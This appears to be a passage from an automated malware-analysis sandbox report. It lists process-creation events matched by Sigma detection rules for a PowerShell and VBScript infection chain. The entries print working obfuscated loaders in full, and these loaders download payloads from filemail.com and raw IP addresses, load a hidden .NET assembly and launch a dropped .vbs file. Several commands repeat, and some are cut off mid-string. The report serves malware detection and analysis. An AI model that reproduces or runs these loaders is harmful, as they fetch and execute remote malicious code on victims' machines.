eC4https://3105.filemail.com/api/file/'+'get?filekey=s'+'hTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ95-'+'dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c eC4;2kdwebClient = New-Object System.Net.WebClient;2kdimageBytes = 2kdwebClient.Dow'+'n'+'loadData(2kdimageUrl);2kdimageText = '+'[System.Te'+'xt.Encoding]::UTF8.GetString(2kdimageBytes'+');2kdstartFlag = eC4<<BASE64_START>>eC'+'4;2kdendFlag = eC4<<BASE64_END>>eC4;2kdstartIndex = 2kdimageText.IndexOf(2kdstartFlag);2kde'+'n'+'dIndex = 2kdimageText.Index'+'Of(2kdendFla'+'g);2kdstartIndex -ge 0 -and 2kdendIndex -gt 2kdstar'+'tIndex;2kdstartIndex += 2kdstartFlag.Lengt'+'h;2kdbase64Length = 2kdendIndex - 2kdstartIndex;2kdbase64Command = 2k'+'dimageT'+'ext.Substring(2kdstartIndex, 2kdbase64Length);2kdbase64Re'+'versed = -join (2kdbase64Command.ToCharArray() syV ForEach-Object { 2kd_ })[-1..-(2kdbase64Command.Length)];2kdcommandBytes = [System.Convert]::FromBas'+'e64String(2kdbase64Reversed);2kdloadedAssembly = [System.Reflection.Assembly]::Load(2kdcommandBytes);2kdvaiMethod = [dnlib.IO.Home].GetMethod(eC4VAIeC4
                    Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('2kdimag'+'eUrl = eC4https://3105.filemail.com/api/file/'+'get?filekey=s'+'hTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ95-'+'dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c eC4;2kdwebClient = New-Object System.Net.WebClient;2kdimageBytes = 2kdwebClient.Dow'+'n'+'loadData(2kdimageUrl);2kdimageText = '+'[System.Te'+'xt.Encoding]::UTF8.GetString(2kdimageBytes'+');2kdstartFlag = eC4<<BASE64_START>>eC'+'4;2kdendFlag = eC4<<BASE64_END>>eC4;2kdstartIndex = 2kdimageText.IndexOf(2kdstartFlag);2kde'+'n'+'dIndex = 2kdimageText.Index'+'Of(2kdendFla'+'g);2kdstartIndex -ge 0 -and 2kdendIndex -gt 2kdstar'+'tIndex;2kdstartIndex += 2kdstartFlag.Lengt'+'h;2kdbase64Length = 2kdendIndex - 2kdstartIndex;2kdbase64Command = 2k'+'dimageT'+'ext.Substring(2kdstartIndex, 2kdbase64Length);2kdbase64Re'+'versed = -join (2kdbase64Command.ToCharArray() syV ForEach-Object { 2kd_ })[-1..-(2kdbase64Command.Length)];2kdcommandBytes = [System.Convert]::FromBas'+'e64String(2kdbase64Reversed);2kdloadedAssembly = [System.Reflection.Assembly]::Load(2kdcommandBytes);2kdvaiMethod = [dnlib.IO.Home].GetMethod(eC4VAIeC4);2kdvaiMethod.Invoke('+'2kdnull, @(eC4txt.FGVGFR/2241/62.64.8'+'61.401//:pttheC4, eC4desativadoeC4, eC4desativadoeC4, eC4desativadoeC4,'+' eC4CasPoleC4, eC4desativadoeC4, eC4desativadoeC4,eC'+'4desativado'+'eC4,eC4desati'+'vadoeC4,eC4desativadoeC4,eC4desativadoeC4,eC4desativadoeC'+'4,eC41eC4,eC4desativadoeC4));') -creplACe ([chAR]115+[chAR]121+[chAR]86),[chAR]124 -RePLAce ([chAR]50+[chAR]107+[chAR]100),[chAR]36 -creplACe'eC4',[chAR]39)| .((gv '*MDr*').NAMe[3,11,2]-jOiN'')", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('2kdimag'+'eUrl = eC4https://3105.filemail.com/api/file/'+'get?filekey=s'+'hTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ95-'+'dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c eC4;2kdwebClient = New-Object System.Net.WebClient;2kdimageBytes = 2kdwebClient.Dow'+'n'+'loadData(2kdimageUrl);2kdimageText = '+'[System.Te'+'xt.Encoding]::UTF8.GetString(2kdimageBytes'+');2kdstartFlag = eC4<<BASE64_START>>eC'+'4;2kdendFlag = eC4<<BASE64_END>>eC4;2kdstartIndex = 2kdimageText.IndexOf(2kdstartFlag);2kde'+'n'+'dIndex = 2kdimageText.Index'+'Of(2kdendFla'+'g);2kdstartIndex -ge 0 -and 2kdendIndex -gt 2kdstar'+'tIndex;2kdstartIndex += 2kdstartFlag.Lengt'+'h;2kdbase64Length = 2kdendIndex - 2kdstartIndex;2kdbase64Command = 2k'+'dimageT'+'ext.Substring(2kdstartIndex, 2kdbase64Length);2kdbase64Re'+'versed = -join (2kdbase64Command.ToCharArray() syV ForEach-Object { 2kd_ })[-1..-(2kdbase64Command.Length)];2kdcommandBytes = [System.Convert]::FromBas'+'e64String(2kdbase64Reversed);2kdloadedAssembly = [System.Reflection.Assembly]::Load(2kdcommandBytes);2kdvaiMethod = [dnlib.IO.Home].GetMethod(eC4VAIeC4
                    Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\bestofthingswithentiretimegivenebstthignstodowithg.vBs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\bestofthingswithentiretimegivenebstthignstodowithg.vBs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Windows\sysTEm32\WInDowSpoWeRShell\V1.0\POwersheLL.exE" "powErsHEll.eXE -EX BYpaSs -noP -W 1 -C dEViCEcReDEntIaLDEployMENt ; IeX($(iEX('[SYsTem.tExT.EnCoDINg]'+[ChAR]0x3a+[ChaR]0x3a+'utF8.GeTSTrING([SystEM.cOnvERt]'+[CHAR]0x3a+[cHAR]58+'FrOMbASe64STrING('+[CHAr]34+'JFM1UFpiNiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZEQtVHlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRW1iZVJERUZpTkl0aU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTE1PTi5EbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBaLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGhwSGhsTndBLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFRSdEdKUEJ0ZSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaEFVYVRQUSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjTWFReEFTWWhsSyk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInhaQm5VRSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNRXNQYWNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ0NzVWlPTklmICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRTNVBaYjY6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xMDQuMTY4LjQ2LjI2LzE0MjIvYmVzdG9mdGhpbmdzd2l0aGVudGlyZXRpbWVnaXZlbmVic3R0aGlnbnN0b2Rvd2l0aGdyZWF0LnRJRiIsIiRFblY6QVBQREFUQVxiZXN0b2Z0aGluZ3N3aXRoZW50aXJldGltZWdpdmVuZWJzdHRoaWduc3RvZG93aXRoZy52QnMiLDAsMCk7U3RhclQtc2xFRVAoMyk7SWkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXGJlc3RvZnRoaW5nc3dpdGhlbnRpcmV0aW1lZ2l2ZW5lYnN0dGhpZ25zdG9kb3dpdGhnLnZCcyI='+[cHaR]0x22+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7492, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\bestofthingswithentiretimegivenebstthignstodowithg.vBs" , ProcessId: 7864, ProcessName: wscript.exe
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnMmtkaW1hZycrJ2VVcmwgPSBlQzRodHRwczovLzMxMDUuZmlsZW1haWwuY29tL2FwaS9maWxlLycrJ2dldD9maWxla2V5PXMnKydoVFBIYkNQWDhvLWxPdENxSExHNl8weEN5LXhsNHRueGxBVmJROTUtJysnZHZpVEs1Y0FSYU5kUWpiYjNtZXhmd1F6S21UWGcmc2tpcHJlZz10cnVlJnBrX3ZpZD1lMDEwOTYzOGM5YmZiOTU3MTczMjUzMTMwOWI1ZmY3YyBlQzQ7Mmtkd2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDsya2RpbWFnZUJ5dGVzID0gMmtkd2ViQ2xpZW50LkRvdycrJ24nKydsb2FkRGF0YSgya2RpbWFnZVVybCk7MmtkaW1hZ2VUZXh0ID0gJysnW1N5c3RlbS5UZScrJ3h0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoMmtkaW1hZ2VCeXRlcycrJyk7Mmtkc3RhcnRGbGFnID0gZUM0PDxCQVNFNjRfU1RBUlQ+PmVDJysnNDsya2RlbmRGbGFnID0gZUM0PDxCQVNFNjRfRU5EPj5lQzQ7Mmtkc3RhcnRJbmRleCA9IDJrZGltYWdlVGV4dC5JbmRleE9mKDJrZHN0YXJ0RmxhZyk7MmtkZScrJ24nKydkSW5kZXggPSAya2RpbWFnZVRleHQuSW5kZXgnKydPZigya2RlbmRGbGEnKydnKTsya2RzdGFydEluZGV4IC1nZSAwIC1hbmQgMmtkZW5kSW5kZXggLWd0IDJrZHN0YXInKyd0SW5kZXg7Mmtkc3RhcnRJbmRleCArPSAya2RzdGFydEZsYWcuTGVuZ3QnKydoOzJrZGJhc2U2NExlbmd0aCA9IDJrZGVuZEluZGV4IC0gMmtkc3RhcnRJbmRleDsya2RiYXNlNjRDb21tYW5kID0gMmsnKydkaW1hZ2VUJysnZXh0LlN1YnN0cmluZygya2RzdGFydEluZGV4LCAya2RiYXNlNjRMZW5ndGgpOzJrZGJhc2U2NFJlJysndmVyc2VkID0gLWpvaW4gKDJrZGJhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSBzeVYgRm9yRWFjaC1PYmplY3QgeyAya2RfIH0pWy0xLi4tKDJrZGJhc2U2NENvbW1hbmQuTGVuZ3RoKV07MmtkY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhcycrJ2U2NFN0cmluZygya2RiYXNlNjRSZXZlcnNlZCk7MmtkbG9hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKDJrZGNvbW1hbmRCeXRlcyk7MmtkdmFpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZChlQzRWQUllQzQpOzJrZHZhaU1ldGhvZC5JbnZva2UoJysnMmtkbnVsbCwgQChlQzR0eHQuRkdWR0ZSLzIyNDEvNjIuNjQuOCcrJzYxLjQwMS8vOnB0dGhlQzQsIGVDNGRlc2F0aXZhZG9lQzQsIGVDNGRlc2F0aXZhZG9lQzQsIGVDNGRlc2F0aXZhZG9lQzQsJysnIGVDNENhc1BvbGVDNCwgZUM0ZGVzYXRpdmFkb2VDNCwgZUM0ZGVzYXRpdmFkb2VDNCxlQycrJzRkZXNhdGl2YWRvJysnZUM0LGVDNGRlc2F0aScrJ3ZhZG9lQzQsZUM0ZGVzYXRpdmFkb2VDNCxlQzRkZXNhdGl2YWRvZUM0LGVDNGRlc2F0aXZhZG9lQycrJzQsZUM0MWVDNCxlQzRkZXNhdGl2YWRvZUM0KSk7JykgIC1jcmVwbEFDZSAgKFtjaEFSXTExNStbY2hBUl0xMjErW2NoQVJdODYpLFtjaEFSXTEyNCAgLVJlUExBY2UgIChbY2hBUl01MCtbY2hBUl0xMDcrW2NoQVJdMTAwKSxbY2hBUl0zNiAtY3JlcGxBQ2UnZUM0JyxbY2hBUl0zOSl8IC4oKGd2ICcqTURyKicpLk5BTWVbMywxMSwyXS1qT2lOJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnMmtkaW1hZycrJ2VVcmwgPSBlQzRodHRwczovLzMxMDUuZmlsZW1haWwuY29tL2FwaS9maWxlLycrJ2dldD9maWxla2V5PXMnKydoVFBIYkNQWDhvLWxPdENxSExHNl8weEN5LXhsNHRueGxBVmJROTUtJysnZHZpVEs1Y0FSYU5kUWpiYjNtZXhmd1F6S21UWGcmc2tpcHJlZz10cnVlJnBrX3ZpZD1lMDEwOTYzOGM5YmZiOTU3MTczMjUzMTMwOWI1ZmY3YyBlQzQ7Mmtkd2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDsya2RpbWFnZUJ5dGVzID0gMmtkd2ViQ2xpZW50LkRvdycrJ24nKydsb2FkRGF0YSgya2RpbWFnZVVybCk7MmtkaW1hZ2VUZXh0ID0gJysnW1N5c3RlbS5UZScrJ3h0LkVuY29kaW5nXTo6VVRGOC5HZXRT
                    Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\sysTEm32\WInDowSpoWeRShell\V1.0\POwersheLL.exE" "powErsHEll.eXE -EX BYpaSs -noP -W 1 -C dEViCEcReDEntIaLDEployMENt ; IeX($(iEX('[SYsTem.tExT.EnCoDINg]'+[ChAR]0x3a+[ChaR]0x3a+'utF8.GeTSTrING([SystEM.cOnvERt]'+[CHAR]0x3a+[cHAR]58+'FrOMbASe64STrING('+[CHAr]34+'JFM1UFpiNiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZEQtVHlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRW1iZVJERUZpTkl0aU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTE1PTi5EbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBaLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGhwSGhsTndBLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFRSdEdKUEJ0ZSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaEFVYVRQUSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjTWFReEFTWWhsSyk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInhaQm5VRSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNRXNQYWNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ0NzVWlPTklmICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRTNVBaYjY6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xMDQuMTY4LjQ2LjI2LzE0MjIvYmVzdG9mdGhpbmdzd2l0aGVudGlyZXRpbWVnaXZlbmVic3R0aGlnbnN0b2Rvd2l0aGdyZWF0LnRJRiIsIiRFblY6QVBQREFUQVxiZXN0b2Z0aGluZ3N3aXRoZW50aXJldGltZWdpdmVuZWJzdHRoaWduc3RvZG93aXRoZy52QnMiLDAsMCk7U3RhclQtc2xFRVAoMyk7SWkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXGJlc3RvZnRoaW5nc3dpdGhlbnRpcmV0aW1lZ2l2ZW5lYnN0dGhpZ25zdG9kb3dpdGhnLnZCcyI='+[cHaR]0x22+'))')))", CommandLine: "C:\Windows\sysTEm32\WInDowSpoWeRShell\V1.0\POwersheLL.exE" "powErsHEll.eXE -EX BYpaSs -noP -W 1 -C dEViCEcReDEntIaLDEployMENt ; IeX($(iEX('[SYsTem.tExT.EnCoDINg]'+[ChAR]0x3a+[ChaR]0x3a+'utF8.GeTSTrING([SystEM.cOnvERt]'+[CHAR]0x3a+[cHAR]58+'FrOMbASe64STrING('+[CHAr]34+'JFM1UFpiNiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZEQtVHlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRW1iZVJERUZpTkl0aU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTE1PTi5EbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBaLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGhwSGhsTndBLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFRSdEdKUEJ0ZSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaEFVYVRQUSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgI
                    Source: Process startedAuthor: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX BYpaSs -noP -W 1 -C dEViCEcReDEntIaLDEployMENt, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX BYpaSs -noP -W 1 -C dEViCEcReDEntIaLDEployMENt, CommandLine|base64offset|contains: E, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\sysTEm32\WInDowSpoWeRShell\V1.0\POwersheLL.exE" "powErsHEll.eXE -EX BYpaSs -noP -W 1 -C dEViCEcReDEntIaLDEployMENt ; IeX($(iEX('[SYsTem.tExT.EnCoDINg]'+[ChAR]0x3a+[ChaR]0x3a+'utF8.GeTSTrING([SystEM.cOnvERt]'+[CHAR]0x3a+[cHAR]58+'FrOMbASe64STrING('+[CHAr]34+'JFM1UFpiNiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZEQtVHlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRW1iZVJERUZpTkl0aU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTE1PTi5EbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBaLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGhwSGhsTndBLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFRSdEdKUEJ0ZSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaEFVYVRQUSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjTWFReEFTWWhsSyk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInhaQm5VRSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNRXNQYWNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ0NzVWlPTklmICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRTNVBaYjY6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xMDQuMTY4LjQ2LjI2LzE0MjIvYmVzdG9mdGhpbmdzd2l0aGVudGlyZXRpbWVnaXZlbmVic3R0aGlnbnN0b2Rvd2l0aGdyZWF0LnRJRiIsIiRFblY6QVBQREFUQVxiZXN0b2Z0aGluZ3N3aXRoZW50aXJldGltZWdpdmVuZWJzdHRoaWduc3RvZG93aXRoZy52QnMiLDAsMCk7U3RhclQtc2xFRVAoMyk7SWkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXGJlc3RvZnRoaW5nc3dpdGhlbnRpcmV0aW1lZ2l2ZW5lYnN0dGhpZ25zdG9kb3dpdGhnLnZCcyI='+[cHaR]0x22+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7492, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX BYpaSs -noP -W 1 -C dEViCEcReDEntIaLDEployMENt, ProcessId: 7624, ProcessName: powershell.exe
                    Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\bestofthingswithentiretimegivenebstthignstodowithg.vBs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\bestofthingswithentiretimegivenebstthignstodowithg.vBs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Windows\sysTEm32\WInDowSpoWeRShell\V1.0\POwersheLL.exE" "powErsHEll.eXE -EX BYpaSs -noP -W 1 -C dEViCEcReDEntIaLDEployMENt ; IeX($(iEX('[SYsTem.tExT.EnCoDINg]'+[ChAR]0x3a+[ChaR]0x3a+'utF8.GeTSTrING([SystEM.cOnvERt]'+[CHAR]0x3a+[cHAR]58+'FrOMbASe64STrING('+[CHAr]34+'JFM1UFpiNiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZEQtVHlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRW1iZVJERUZpTkl0aU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTE1PTi5EbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBaLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGhwSGhsTndBLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFRSdEdKUEJ0ZSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaEFVYVRQUSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjTWFReEFTWWhsSyk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInhaQm5VRSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNRXNQYWNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ0NzVWlPTklmICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRTNVBaYjY6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xMDQuMTY4LjQ2LjI2LzE0MjIvYmVzdG9mdGhpbmdzd2l0aGVudGlyZXRpbWVnaXZlbmVic3R0aGlnbnN0b2Rvd2l0aGdyZWF0LnRJRiIsIiRFblY6QVBQREFUQVxiZXN0b2Z0aGluZ3N3aXRoZW50aXJldGltZWdpdmVuZWJzdHRoaWduc3RvZG93aXRoZy52QnMiLDAsMCk7U3RhclQtc2xFRVAoMyk7SWkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXGJlc3RvZnRoaW5nc3dpdGhlbnRpcmV0aW1lZ2l2ZW5lYnN0dGhpZ25zdG9kb3dpdGhnLnZCcyI='+[cHaR]0x22+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7492, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\bestofthingswithentiretimegivenebstthignstodowithg.vBs" , ProcessId: 7864, ProcessName: wscript.exe
                    Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnMmtkaW1hZycrJ2VVcmwgPSBlQzRodHRwczovLzMxMDUuZmlsZW1haWwuY29tL2FwaS9maWxlLycrJ2dldD9maWxla2V5PXMnKydoVFBIYkNQWDhvLWxPdENxSExHNl8weEN5LXhsNHRueGxBVmJROTUtJysnZHZpVEs1Y0FSYU5kUWpiYjNtZXhmd1F6S21UWGcmc2tpcHJlZz10cnVlJnBrX3ZpZD1lMDEwOTYzOGM5YmZiOTU3MTczMjUzMTMwOWI1ZmY3YyBlQzQ7Mmtkd2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDsya2RpbWFnZUJ5dGVzID0gMmtkd2ViQ2xpZW50LkRvdycrJ24nKydsb2FkRGF0YSgya2RpbWFnZVVybCk7MmtkaW1hZ2VUZXh0ID0gJysnW1N5c3RlbS5UZScrJ3h0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoMmtkaW1hZ2VCeXRlcycrJyk7Mmtkc3RhcnRGbGFnID0gZUM0PDxCQVNFNjRfU1RBUlQ+PmVDJysnNDsya2RlbmRGbGFnID0gZUM0PDxCQVNFNjRfRU5EPj5lQzQ7Mmtkc3RhcnRJbmRleCA9IDJrZGltYWdlVGV4dC5JbmRleE9mKDJrZHN0YXJ0RmxhZyk7MmtkZScrJ24nKydkSW5kZXggPSAya2RpbWFnZVRleHQuSW5kZXgnKydPZigya2RlbmRGbGEnKydnKTsya2RzdGFydEluZGV4IC1nZSAwIC1hbmQgMmtkZW5kSW5kZXggLWd0IDJrZHN0YXInKyd0SW5kZXg7Mmtkc3RhcnRJbmRleCArPSAya2RzdGFydEZsYWcuTGVuZ3QnKydoOzJrZGJhc2U2NExlbmd0aCA9IDJrZGVuZEluZGV4IC0gMmtkc3RhcnRJbmRleDsya2RiYXNlNjRDb21tYW5kID0gMmsnKydkaW1hZ2VUJysnZXh0LlN1YnN0cmluZygya2RzdGFydEluZGV4LCAya2RiYXNlNjRMZW5ndGgpOzJrZGJhc2U2NFJlJysndmVyc2VkID0gLWpvaW4gKDJrZGJhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSBzeVYgRm9yRWFjaC1PYmplY3QgeyAya2RfIH0pWy0xLi4tKDJrZGJhc2U2NENvbW1hbmQuTGVuZ3RoKV07MmtkY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhcycrJ2U2NFN0cmluZygya2RiYXNlNjRSZXZlcnNlZCk7MmtkbG9hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKDJr